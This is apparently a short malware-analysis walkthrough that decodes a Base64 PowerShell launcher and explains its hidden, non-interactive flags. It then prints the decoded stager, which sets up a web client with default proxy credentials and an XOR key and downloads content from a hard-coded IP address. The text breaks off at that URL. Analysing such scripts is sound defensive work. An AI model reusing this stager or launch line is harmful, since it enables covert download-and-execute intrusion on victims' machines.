Dissecting a Malicious PowerShell Script: A Detailed Analysis

Introduction

You’ve stumbled upon a puzzling Base64-encoded PowerShell script that appears to have malicious intent. As a cybersecurity professional, your mission is to dive deep into this script, uncover its true nature, and reveal the potential risks it poses to our digital realm. Get ready to embark on a daring quest to safeguard our systems!

Decoding the Script

The first step is to decode the Base64-encoded script. By using the CyberChef tool, we can quickly reveal the underlying PowerShell code. The script starts with a series of command-line arguments that are designed to make the PowerShell window hidden and non-interactive when executed.

powershell.exe -NoP -sta -NonI -W Hidden -Enc

These arguments include:

  • -NoP: Suppresses the loading of the Windows PowerShell profile.
  • -sta: Starts PowerShell in a single-threaded apartment.
  • -NonI: Runs PowerShell in non-interactive mode, preventing any prompts.
  • -W Hidden: Sets the window style to hidden, making the PowerShell window invisible.
  • -Enc: Accepts a Base64-encoded string as the command to be executed.

After decoding the Base64 string, we can see the actual PowerShell code that the script is running:

$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeADeRS.ADd('User-Agent',$u);$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';$i=0;[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg("http://98.103.103.170:7443/index.asp